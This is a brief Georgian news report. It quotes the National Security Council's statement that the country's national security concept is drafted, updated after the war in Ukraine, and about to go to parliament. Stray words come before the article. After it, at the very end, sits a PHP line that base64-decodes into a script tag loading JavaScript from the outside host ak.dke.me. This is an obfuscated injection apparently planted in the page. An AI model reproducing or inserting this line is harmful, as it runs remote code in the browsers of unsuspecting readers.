celsiusi
ავერსი საქკაბელი
„საქართველოს ეროვნული უსაფრთხოების კონცეფცია შემუშავებულია და დოკუმენტი მზად არის დამტკიცების პროცედურების დასაწყებად“, - ამის შესახებ ინფორმაციას ეროვნული უსაფრთხოების საბჭოს აპარატში ავრცელებენ. 
 
„საქართველოს ეროვნული უსაფრთხოების კონცეფცია შემუშავებულია და დოკუმენტი მზად არის დამტკიცების პროცედურების დასაწყებად. კონცეფცია არასამთავრობო სექტორთან, აკადემიურ პროფესიულ წრეებთან, სახელმწიფო უწყებებთან, პრეზიდენტისა და პრემიერის ადმინისტრაციებთან, პარლამენტის შესაბამის კომიტეტებსა და უცხოელ პარტნიორებთან მჭიდრო კონსულტაციების შედეგად შემუშავდა.  დოკუმენტის მომზადების პროცესში ასევე ჩართულნი იყვნენ უცხოელი პარტნიორები, გაზიარებული იქნა საერთაშორისო საუკეთესო პრაქტიკა და ექსპერტული მოსაზრებები.  უკრაინაში საომარი მოქმედებებიდან, რეგიონული და გლობალური უსაფრთხოების გარემოსა და არსებული გამოწვევებიდან გამომდინარე ეროვნული უსაფრთხოების კონცეფციის პარლამენტში გაგზავნამდე, დოკუმენტი განახლდა და ის საკანონმდებლო ორგანოს განსახილველად უახლოეს პერიოდში გადაეგზავნება. იმ გარემოების გათვალისწინებით, რომ კონცეფციის პროექტი იანვრის ბოლოს დაგზავნილ იქნა 30-მდე არასამთავრობო ორგანიზაციისა და აკადემიური წრეების წარმომადგენლებთან, შემდგომ პერიოდში მედიაში ფართოდ და პოზიტიურად გაშუქდა, მიუღებელია ხსენებული საკითხით პოლიტიკური სპეკულირება“, - წერია საბჭოს გავრცელებულ განცხადებაში.  
657
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");